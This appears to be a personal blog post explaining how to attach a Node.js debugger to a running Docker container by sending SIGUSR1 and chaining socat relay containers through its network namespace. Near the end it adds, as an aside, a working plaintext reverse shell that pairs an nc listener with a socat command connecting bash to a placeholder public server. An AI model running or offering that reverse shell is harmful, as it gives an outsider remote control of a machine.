A few days ago I needed to attach a debugger to a node container running in a
cloud environment. The simplest solution would be to change the task definition
to include --inspect
and restart the instance. However, in this case, my bug
was difficult to reproduce and occurred intermittently after several hours.
Rebooting was not an option.
It turns out that a node process will start a debugger if you send a USR1 signal to it. When the debugger starts, it is only listening on localhost, which means that it won't let my remote debugger attach. However, if it were possible to route my traffic to inside the container, we'd have a debugger!
# send a signal to the node process to enable a debugger
docker exec -it $CONTAINER_ID kill -usr1 1
Recently I found a video by
LiveOverflow which describes how
docker isolation works. I'd recommend watching it, as it really helped connect
some dots for me. The gist of it is that containers owe most of their
isolation to the Linux kernel. When the container is started, docker will make
an unshare()
system call, which moves the process into its own sandboxed
namespace. Inside the sandbox, a process can do whatever it likes without
affecting anything outside it. If we could start another process inside the
same namespace, perhaps we could tunnel some traffic to the outside world.
docker run --network=container:<container id>
to the rescue!
This argument will tell docker to start a new container, but instead of creating a new namespace, it will re-use the network namespace of the container id that we pass it. Let's boot up a little relay to smuggle out the traffic.
docker run --rm -d --name socat-nid \
--network=container:$CONTAINER_ID \
alpine/socat \
TCP-LISTEN:9339,fork TCP:127.0.0.1:9229
After running this command we find ourselves with a setup similar to this.
We've opened a new port 9339
, but it's still stuck inside the container!
Although it doesn't look like we have achieved much here, unlike the node port,
the new port doesn't check if the request is coming from localhost.
Unfortunately, this isn't the end of our work. Docker won't let you connect to a port inside a container from the host machine, unless the container exposes it at startup. Yet another thing that we can't do without rebooting the container.
But containers can reach this port! What if we used our socat
trick one more
time to tunnel from the host machine to our new port?
# first find the IP of the container to instrument
IP=$(docker inspect -f "{{.NetworkSettings.IPAddress}}" $CONTAINER_ID)
# start another tunnel container
docker run --rm -d -p 9449:9449 \
--name socat \
alpine/socat \
TCP-LISTEN:9449,fork TCP:$IP:9339
That's it! Connections to the port 9449
will tunnel all the way through to the
node container, bypass the localhost restriction, and let us attach a debugger,
leaving node none the wiser!
This concept isn't new; I found it described by a blog post when first trying to debug the issue. In this post, I've tried to strip down the concept to its parts, and dive deeper into the docker internals that makes it work.
socat
trickBefore trying this I'd never heard of socat
. While reading up about it for this
post I found some very interesting uses. Here is a super dirty (plaintext!)
reverse shell!
# start a listener on the public server
nc -lp 3180
# execute on the machine to access
socat exec:'bash -i',pty,stderr tcp:<publicly server address>:3180